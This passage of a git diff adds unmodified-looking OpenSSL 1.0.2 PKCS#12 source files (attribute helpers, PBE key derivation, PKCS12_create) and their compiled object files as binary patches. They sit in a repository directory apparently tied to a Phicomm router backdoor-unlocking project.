+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/pkcs12.h>
+
+/* Add a local keyid to a safebag */
+
+int PKCS12_add_localkeyid(PKCS12_SAFEBAG *bag, unsigned char *name,
+                          int namelen)
+{
+    if (X509at_add1_attr_by_NID(&bag->attrib, NID_localKeyID,
+                                V_ASN1_OCTET_STRING, name, namelen))
+        return 1;
+    else
+        return 0;
+}
+
+/* Add key usage to PKCS#8 structure */
+
+int PKCS8_add_keyusage(PKCS8_PRIV_KEY_INFO *p8, int usage)
+{
+    unsigned char us_val;
+    us_val = (unsigned char)usage;
+    if (X509at_add1_attr_by_NID(&p8->attributes, NID_key_usage,
+                                V_ASN1_BIT_STRING, &us_val, 1))
+        return 1;
+    else
+        return 0;
+}
+
+/* Add a friendlyname to a safebag */
+
+int PKCS12_add_friendlyname_asc(PKCS12_SAFEBAG *bag, const char *name,
+                                int namelen)
+{
+    if (X509at_add1_attr_by_NID(&bag->attrib, NID_friendlyName,
+                                MBSTRING_ASC, (unsigned char *)name, namelen))
+        return 1;
+    else
+        return 0;
+}
+
+int PKCS12_add_friendlyname_uni(PKCS12_SAFEBAG *bag,
+                                const unsigned char *name, int namelen)
+{
+    if (X509at_add1_attr_by_NID(&bag->attrib, NID_friendlyName,
+                                MBSTRING_BMP, name, namelen))
+        return 1;
+    else
+        return 0;
+}
+
+int PKCS12_add_CSPName_asc(PKCS12_SAFEBAG *bag, const char *name, int namelen)
+{
+    if (X509at_add1_attr_by_NID(&bag->attrib, NID_ms_csp_name,
+                                MBSTRING_ASC, (unsigned char *)name, namelen))
+        return 1;
+    else
+        return 0;
+}
+
+ASN1_TYPE *PKCS12_get_attr_gen(STACK_OF(X509_ATTRIBUTE) *attrs, int attr_nid)
+{
+    X509_ATTRIBUTE *attrib;
+    int i;
+    if (!attrs)
+        return NULL;
+    for (i = 0; i < sk_X509_ATTRIBUTE_num(attrs); i++) {
+        attrib = sk_X509_ATTRIBUTE_value(attrs, i);
+        if (OBJ_obj2nid(attrib->object) == attr_nid) {
+            if (sk_ASN1_TYPE_num(attrib->value.set))
+                return sk_ASN1_TYPE_value(attrib->value.set, 0);
+            else
+                return NULL;
+        }
+    }
+    return NULL;
+}
+
+char *PKCS12_get_friendlyname(PKCS12_SAFEBAG *bag)
+{
+    ASN1_TYPE *atype;
+    if (!(atype = PKCS12_get_attr(bag, NID_friendlyName)))
+        return NULL;
+    if (atype->type != V_ASN1_BMPSTRING)
+        return NULL;
+    return OPENSSL_uni2asc(atype->value.bmpstring->data,
+                           atype->value.bmpstring->length);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_attr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_attr.o
new file mode 100644
index 0000000000000000000000000000000000000000..effb071ea373ca3e454642aa7cf8dcafcdd2ee98
GIT binary patch
literal 3096
zcmbuBL2MgE6hOyzLY5@mxTPSApt3>%xq>d<v<N2$<c;HGX|2TI7?nU+*7i0Dah%BB
zMF|j!6auwOr5-@yP>^~-95^5$A=E=<$!U>LD{%uZa6tt`FI5ExKnnlQ&XCEnMhLz%
z`7>|+|MO@6%s8hr*@<u{M7V^=V`O*4DIs4=yZsdHrpP|hPi_qy`YmTPZt9IMjm^)a
z7rS8Y(tGgdM>Lu>wps)4v<5zHwb9Vnyb%K{<zfWp^v`geveE3iKMozEF+L<|E#qu<
zs3&#C8S1%|2TG%OL5$|ikW@B~9;D_@H=TmW#^!d6Mi<ivMInvzJb*6^(J=gP4Qa#+
zkaFP0wsxF(y`VRK(PuK+_l3OC`27i^@g23*N47UoFc@!K_qNka8jZ_r>awdC&5bA>
zZMB>j4zyqOlh4fQ&+2nO!48PNv;FfYvs%kTZO!|ZPZ`bA(cLY=H*)UWOdfKhMl&TD
z%{8f+c$&Ivt=Tr2Os7Ycc%kT49akAqkE)3y+M_NVYOf9_)WosF9>xVxu#WI)NH?^}
zsR9WT(n5xnLpkUv5_;)L5?YIf2K#%YbMSSL-^1n(qt3|DSy`g|7~{{OHe@ASkR`Ow
zGVZr8ci^uC@EowW8Ly*0AxF=KGji;$$hfS$(WT4r&F*nIvC%8X^|q|&SLE2(RXI9#
zO_nl!6LLHa3=j}m(%V<AUL!<-FtjkBHE6h(QZL%4VMqTgc(%L9&7B~tNZ<{_Z_B^#
zUattP#$JY_2)XU=kn)}mJUHtJt@2)%ei$AQ@}#u^b{{l67k)_s2;x{5jKlqD?SYj#
z*gMSrP0%RZ?;P|o&c~GQ@{bt*#>d-?hp`YK^h|*M3R+N}-*(_Xbl|suV?Hj6PtOOi
zJ{SkZC#%}9X*o_!Es@-bbRI|LvRPRvS(PPweX&f;$?Wu)o;9Z@Ci0mXb4DM_W=wMO
zk;I7QpshyT&EmQ__4qiAk)$EO+pSykHZje*W0jW7(!!E?%37?5>zt}B+SPJpy=pDn
zrd8jQ!=5>}x+wak^SLRX%e)Qgz(&k@yGrUyX4PFr^`cdAZ8AM}+*~QXFkFQVv2CKg
zxCEKbWv24^tO-jEV=7ec_7pwoebE17$CKwf@RtR?Pq4ora52so9XQqz1>ZK&{$5sB
z<OiVfd>$6~9ReQ}IKFAz-VnGL=XHVa7wk=ei}BwV_+5g%0(}&CpJ}55_=EQmg>!z7
zavuJR^Lw`7<NThz=HvXHz3b!rp55?qem{s>Ute~tB50@P=>^`a*%eE5>@|m|Wy`UM
zTCCTJT3T6NwyVIZD~_$gZ_p8XyxDlZ>Z+@?l~udutP_<+uovK*!C_??{6D3DJAQKi
z3!4Il@&T)dH}Y(GAN3$KJUc09qMTs?lgz&tCb7$3<`^@6fN}pX!gb%e%$&yHebf&@
z!<hfoAKx=vDgjLtzW#$Egg#G;>rsJ;ru*?g1_<}#Q^%o$zhZv#7y}A7WSW0Jj*HO2
zn125x1Cnn+zyBQg2Gy^HNr8OmDT4JwU+&NA7qm9Iq*y`XEDwBhZV&KB=C2(fvVi}P
YfeiZc_YDcYDS`eh(F%>S`^WG9C)NJhC;$Ke

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crpt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crpt.c
new file mode 100644
index 0000000..3a166e6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crpt.c
@@ -0,0 +1,116 @@
+/* p12_crpt.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/pkcs12.h>
+
+/* PKCS#12 PBE algorithms now in static table */
+
+void PKCS12_PBE_add(void)
+{
+}
+
+int PKCS12_PBE_keyivgen(EVP_CIPHER_CTX *ctx, const char *pass, int passlen,
+                        ASN1_TYPE *param, const EVP_CIPHER *cipher,
+                        const EVP_MD *md, int en_de)
+{
+    PBEPARAM *pbe;
+    int saltlen, iter, ret;
+    unsigned char *salt;
+    const unsigned char *pbuf;
+    unsigned char key[EVP_MAX_KEY_LENGTH], iv[EVP_MAX_IV_LENGTH];
+
+    /* Extract useful info from parameter */
+    if (param == NULL || param->type != V_ASN1_SEQUENCE ||
+        param->value.sequence == NULL) {
+        PKCS12err(PKCS12_F_PKCS12_PBE_KEYIVGEN, PKCS12_R_DECODE_ERROR);
+        return 0;
+    }
+
+    pbuf = param->value.sequence->data;
+    if (!(pbe = d2i_PBEPARAM(NULL, &pbuf, param->value.sequence->length))) {
+        PKCS12err(PKCS12_F_PKCS12_PBE_KEYIVGEN, PKCS12_R_DECODE_ERROR);
+        return 0;
+    }
+
+    if (!pbe->iter)
+        iter = 1;
+    else
+        iter = ASN1_INTEGER_get(pbe->iter);
+    salt = pbe->salt->data;
+    saltlen = pbe->salt->length;
+    if (!PKCS12_key_gen(pass, passlen, salt, saltlen, PKCS12_KEY_ID,
+                        iter, EVP_CIPHER_key_length(cipher), key, md)) {
+        PKCS12err(PKCS12_F_PKCS12_PBE_KEYIVGEN, PKCS12_R_KEY_GEN_ERROR);
+        PBEPARAM_free(pbe);
+        return 0;
+    }
+    if (!PKCS12_key_gen(pass, passlen, salt, saltlen, PKCS12_IV_ID,
+                        iter, EVP_CIPHER_iv_length(cipher), iv, md)) {
+        PKCS12err(PKCS12_F_PKCS12_PBE_KEYIVGEN, PKCS12_R_IV_GEN_ERROR);
+        PBEPARAM_free(pbe);
+        return 0;
+    }
+    PBEPARAM_free(pbe);
+    ret = EVP_CipherInit_ex(ctx, cipher, NULL, key, iv, en_de);
+    OPENSSL_cleanse(key, EVP_MAX_KEY_LENGTH);
+    OPENSSL_cleanse(iv, EVP_MAX_IV_LENGTH);
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crpt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crpt.o
new file mode 100644
index 0000000000000000000000000000000000000000..81b9e8f0ae73150f676178da5da8cf297dcb9de8
GIT binary patch
literal 2872
zcmbuAO>7%Q6oAKZ(rh8!m;zFyM#vHi1VI-&tyH%{C~JG|3Ed{fPFf@qwvN4xO&rJA
z>&ihDsEPtvZBsZS4shgvxIzWR&>&H90Kp}<a^a^cQu(<6LJIG#XPT+&l@L7X?ace;
zy*F>)?9VH@k?IQs2$ukPitJjP67t93?tH?VPLO?Mi2OeMz+YGJqMg!CYO~tRY>uA)
zc>_GCb503S$5td~Mj0tmxBsCr4=0sYv`yEq+Va}bP;)PJHHogbn_)fLj$XZFfzRa@
zTt0aaE<b^iX#08!YNBpNqMNo7j_#arwhZS>3W>wC5b~U;^EqU(FHyH8X&>S((DfZ#
z^42uxQ|ju(aDGfWhB9inH7V)FI!hm*>obP)ThjS6XKYp!s?BDSuAw~X+DeSN=ajKd
z{<W<z;!!9y<RlfTQ|=N(-#E@Qvy^=RAzc=-=IG{}63h8zgk+EGCVK(my6&AiH@&1c
z5`2awg(jVC!?~VxFDPw@iGE`^KX`7JC%`nEo0zi$LI9|9%`;q})SXjWMS5t|I}Lll
zTcGE+Ho)(>d2LRc*PhqRD<qvr91D-lE;OrlGkjD%q(%-#k2F0q`to>0jU0ZogCP#2
z9~8G508LNL5@<miSr8QEzRo}bFJ(!f6$%^}8kF9E)?>^lTf<nC8fe6u5%Mh_Pf8BG
z-WQigE(YUrc(Xq)k6jqh<jAXgG&#05n3mgtzW3xW0%`ec(CvUGe-}6fum&s%EG4kM
zi*gJ?HF*qDLCUxsipvt)tjB=c_mf|DdMv@c;p&|dymi;NuLZp>-OkVol0A1qj|(rI
z;1MLf3l4hS7aU<a1iD|SllS-l<J|W84D1O|Jd<wG0rcWIAAZ`0zv#nX^Wks$@b`WA
z$3FZkAAZe;lUj7#EYxeZS|FL@i5ys&xNhc)MbTWcR?BA>ttv6o#&ldW%;{7rr_Y!(
zTHMf0qGz*at!bN9y}nW>#ql!c$Y@#Z1krL+QFC%?Mo;TmbJ4PiellYwCNmUF$ZA%s
z>Y`oZdm({s%zUFDI+oAg@?&|;Gj+@AxRh%pt3FvR!}cvQozbUqIm0YetbDa$5z}ng
z`NEP}C@q<1^5qIS4ShhtcNU+Szjr#ajt~U-K2XlzK?s6e2Ic%CgdoU=K{@{(AqaAO
zjyNA?uMqNk1b#%|qW_%0#X5@u-!J5;`fyj^_X_@R2^_y!yv}!h_-6vYU+@pZ90h*`
zs9X-S3FrL%BWh!H+0HM(XxBSqiO=d*C9m36%O+|uZ|8}+&}a~~u(G^tRe@DkY)gf2
z?m_QJnY~zTs<rw`&8pk0MD;RQC3rgW%N8%?e~n>?##`_Ha!mk3*=Bv|SRG$J#}U6j
zc;*wJqDU-ZhQ;3ni#X+9yb<R7Fys9H!Y~;To6RBf6-@Ft7?|_F#z$Gsh?o@SeE-L~
zIBy3ZkFoeJH<I|5^*;@P_;=`brwoL<67&9XyZ{rdr8~aFz}wuBjotC{z<ZtFv+S3}
z`-10(u{@riU$4D!D~TOQh}Cg7u)RIvk#(OPATq*Us9(?!g!i2z{MPh}-(dAuxFZ|8
G<NpENdcVs6

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crt.c
new file mode 100644
index 0000000..7d2aeef
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crt.c
@@ -0,0 +1,358 @@
+/* p12_crt.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/pkcs12.h>
+
+static int pkcs12_add_bag(STACK_OF(PKCS12_SAFEBAG) **pbags,
+                          PKCS12_SAFEBAG *bag);
+
+static int copy_bag_attr(PKCS12_SAFEBAG *bag, EVP_PKEY *pkey, int nid)
+{
+    int idx;
+    X509_ATTRIBUTE *attr;
+    idx = EVP_PKEY_get_attr_by_NID(pkey, nid, -1);
+    if (idx < 0)
+        return 1;
+    attr = EVP_PKEY_get_attr(pkey, idx);
+    if (!X509at_add1_attr(&bag->attrib, attr))
+        return 0;
+    return 1;
+}
+
+PKCS12 *PKCS12_create(char *pass, char *name, EVP_PKEY *pkey, X509 *cert,
+                      STACK_OF(X509) *ca, int nid_key, int nid_cert, int iter,
+                      int mac_iter, int keytype)
+{
+    PKCS12 *p12 = NULL;
+    STACK_OF(PKCS7) *safes = NULL;
+    STACK_OF(PKCS12_SAFEBAG) *bags = NULL;
+    PKCS12_SAFEBAG *bag = NULL;
+    int i;
+    unsigned char keyid[EVP_MAX_MD_SIZE];
+    unsigned int keyidlen = 0;
+
+    /* Set defaults */
+    if (!nid_cert) {
+#ifdef OPENSSL_FIPS
+        if (FIPS_mode())
+            nid_cert = NID_pbe_WithSHA1And3_Key_TripleDES_CBC;
+        else
+#endif
+#ifdef OPENSSL_NO_RC2
+            nid_cert = NID_pbe_WithSHA1And3_Key_TripleDES_CBC;
+#else
+            nid_cert = NID_pbe_WithSHA1And40BitRC2_CBC;
+#endif
+    }
+    if (!nid_key)
+        nid_key = NID_pbe_WithSHA1And3_Key_TripleDES_CBC;
+    if (!iter)
+        iter = PKCS12_DEFAULT_ITER;
+    if (!mac_iter)
+        mac_iter = 1;
+
+    if (!pkey && !cert && !ca) {
+        PKCS12err(PKCS12_F_PKCS12_CREATE, PKCS12_R_INVALID_NULL_ARGUMENT);
+        return NULL;
+    }
+
+    if (pkey && cert) {
+        if (!X509_check_private_key(cert, pkey))
+            return NULL;
+        X509_digest(cert, EVP_sha1(), keyid, &keyidlen);
+    }
+
+    if (cert) {
+        bag = PKCS12_add_cert(&bags, cert);
+        if (name && !PKCS12_add_friendlyname(bag, name, -1))
+            goto err;
+        if (keyidlen && !PKCS12_add_localkeyid(bag, keyid, keyidlen))
+            goto err;
+    }
+
+    /* Add all other certificates */
+    for (i = 0; i < sk_X509_num(ca); i++) {
+        if (!PKCS12_add_cert(&bags, sk_X509_value(ca, i)))
+            goto err;
+    }
+
+    if (bags && !PKCS12_add_safe(&safes, bags, nid_cert, iter, pass))
+        goto err;
+
+    sk_PKCS12_SAFEBAG_pop_free(bags, PKCS12_SAFEBAG_free);
+    bags = NULL;
+
+    if (pkey) {
+        bag = PKCS12_add_key(&bags, pkey, keytype, iter, nid_key, pass);
+
+        if (!bag)
+            goto err;
+
+        if (!copy_bag_attr(bag, pkey, NID_ms_csp_name))
+            goto err;
+        if (!copy_bag_attr(bag, pkey, NID_LocalKeySet))
+            goto err;
+
+        if (name && !PKCS12_add_friendlyname(bag, name, -1))
+            goto err;
+        if (keyidlen && !PKCS12_add_localkeyid(bag, keyid, keyidlen))
+            goto err;
+    }
+
+    if (bags && !PKCS12_add_safe(&safes, bags, -1, 0, NULL))
+        goto err;
+
+    sk_PKCS12_SAFEBAG_pop_free(bags, PKCS12_SAFEBAG_free);
+    bags = NULL;
+
+    p12 = PKCS12_add_safes(safes, 0);
+
+    if (!p12)
+        goto err;
+
+    sk_PKCS7_pop_free(safes, PKCS7_free);
+
+    safes = NULL;
+
+    if ((mac_iter != -1) &&
+        !PKCS12_set_mac(p12, pass, -1, NULL, 0, mac_iter, NULL))
+        goto err;
+
+    return p12;
+
+ err:
+
+    if (p12)
+        PKCS12_free(p12);
+    if (safes)
+        sk_PKCS7_pop_free(safes, PKCS7_free);
+    if (bags)
+        sk_PKCS12_SAFEBAG_pop_free(bags, PKCS12_SAFEBAG_free);
+    return NULL;
+
+}
+
+PKCS12_SAFEBAG *PKCS12_add_cert(STACK_OF(PKCS12_SAFEBAG) **pbags, X509 *cert)
+{
+    PKCS12_SAFEBAG *bag = NULL;
+    char *name;
+    int namelen = -1;
+    unsigned char *keyid;
+    int keyidlen = -1;
+
+    /* Add user certificate */
+    if (!(bag = PKCS12_x5092certbag(cert)))
+        goto err;
+
+    /*
+     * Use friendlyName and localKeyID in certificate. (if present)
+     */
+
+    name = (char *)X509_alias_get0(cert, &namelen);
+
+    if (name && !PKCS12_add_friendlyname(bag, name, namelen))
+        goto err;
+
+    keyid = X509_keyid_get0(cert, &keyidlen);
+
+    if (keyid && !PKCS12_add_localkeyid(bag, keyid, keyidlen))
+        goto err;
+
+    if (!pkcs12_add_bag(pbags, bag))
+        goto err;
+
+    return bag;
+
+ err:
+
+    if (bag)
+        PKCS12_SAFEBAG_free(bag);
+
+    return NULL;
+
+}
+
+PKCS12_SAFEBAG *PKCS12_add_key(STACK_OF(PKCS12_SAFEBAG) **pbags,
+                               EVP_PKEY *key, int key_usage, int iter,
+                               int nid_key, char *pass)
+{
+
+    PKCS12_SAFEBAG *bag = NULL;
+    PKCS8_PRIV_KEY_INFO *p8 = NULL;
+
+    /* Make a PKCS#8 structure */
+    if (!(p8 = EVP_PKEY2PKCS8(key)))
+        goto err;
+    if (key_usage && !PKCS8_add_keyusage(p8, key_usage))
+        goto err;
+    if (nid_key != -1) {
+        bag = PKCS12_MAKE_SHKEYBAG(nid_key, pass, -1, NULL, 0, iter, p8);
+        PKCS8_PRIV_KEY_INFO_free(p8);
+    } else
+        bag = PKCS12_MAKE_KEYBAG(p8);
+
+    if (!bag)
+        goto err;
+
+    if (!pkcs12_add_bag(pbags, bag))
+        goto err;
+
+    return bag;
+
+ err:
+
+    if (bag)
+        PKCS12_SAFEBAG_free(bag);
+
+    return NULL;
+
+}
+
+int PKCS12_add_safe(STACK_OF(PKCS7) **psafes, STACK_OF(PKCS12_SAFEBAG) *bags,
+                    int nid_safe, int iter, char *pass)
+{
+    PKCS7 *p7 = NULL;
+    int free_safes = 0;
+
+    if (!*psafes) {
+        *psafes = sk_PKCS7_new_null();
+        if (!*psafes)
+            return 0;
+        free_safes = 1;
+    } else
+        free_safes = 0;
+
+    if (nid_safe == 0)
+#ifdef OPENSSL_NO_RC2
+        nid_safe = NID_pbe_WithSHA1And3_Key_TripleDES_CBC;
+#else
+        nid_safe = NID_pbe_WithSHA1And40BitRC2_CBC;
+#endif
+
+    if (nid_safe == -1)
+        p7 = PKCS12_pack_p7data(bags);
+    else
+        p7 = PKCS12_pack_p7encdata(nid_safe, pass, -1, NULL, 0, iter, bags);
+    if (!p7)
+        goto err;
+
+    if (!sk_PKCS7_push(*psafes, p7))
+        goto err;
+
+    return 1;
+
+ err:
+    if (free_safes) {
+        sk_PKCS7_free(*psafes);
+        *psafes = NULL;
+    }
+
+    if (p7)
+        PKCS7_free(p7);
+
+    return 0;
+
+}
+
+static int pkcs12_add_bag(STACK_OF(PKCS12_SAFEBAG) **pbags,
+                          PKCS12_SAFEBAG *bag)
+{
+    int free_bags;
+    if (!pbags)
+        return 1;
+    if (!*pbags) {
+        *pbags = sk_PKCS12_SAFEBAG_new_null();
+        if (!*pbags)
+            return 0;
+        free_bags = 1;
+    } else
+        free_bags = 0;
+
+    if (!sk_PKCS12_SAFEBAG_push(*pbags, bag)) {
+        if (free_bags) {
+            sk_PKCS12_SAFEBAG_free(*pbags);
+            *pbags = NULL;
+        }
+        return 0;
+    }
+
+    return 1;
+
+}
+
+PKCS12 *PKCS12_add_safes(STACK_OF(PKCS7) *safes, int nid_p7)
+{
+    PKCS12 *p12;
+    if (nid_p7 <= 0)
+        nid_p7 = NID_pkcs7_data;
+    p12 = PKCS12_init(nid_p7);
+
+    if (!p12)
+        return NULL;
+
+    if (!PKCS12_pack_authsafes(p12, safes)) {
+        PKCS12_free(p12);
+        return NULL;
+    }
+
+    return p12;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_crt.o
new file mode 100644
index 0000000000000000000000000000000000000000..cbdd1887ee2f8b698d4bb602aad4c9ba09655eee
GIT binary patch
literal 6600
zcmbuDZ){W76~JF?2SQ0-QpmvLPwN&J!UnF*9}$?w@*F#P0S7|<&;X-Pj$?32;spCW
znlMH`IF9<}grRD5?U$)jt7+=?p;M)avUaruO-8$kX=7-k`+(Fx5E;r)*MJz{opay2
z&WZ8+vRx_f-uJubo_o%@=iYan7lWZjTUnXFOPR1$n0ez=5MEj|)2?UDdf`!_Qs|WR
zuk}l*kMixZ{vTPtx$7Es>Jz6?NqTx{IWUIg@gG#n`h?L=XRA(StA3l^yKnzlIh|Jz
zboy>E1*z*!IrTk3bIH2uu6Q4n7$Y+9DyOruZr2>XY|bNRzQa1wS#>U(E4MU#L;W1E
z9&lF}V<zorO9tNM)Hx?i#RSiORrUB?sk2$XFYC9Z4s<|HU9awuGmfWgL0(1$zU-vK
zorf|Ra67PO8k_ZVV1pW!^)Cu;=@Wpo#qzl7b`-&dxhFF<?vQ@fv{bvCdm_`}cFYj9
zDx`lAf(YGykk5mf`Op>geP)=ChWE(p4Xf001E$VZhx9A^rSD7o4M(1B(Jx55CH>Nj
zOF{iyXS@Ef)Mg9;i~D8$!(e(^TPvmR<<+`fA^kx>zbfhf=nVR@zVonrhNylMTx8AX
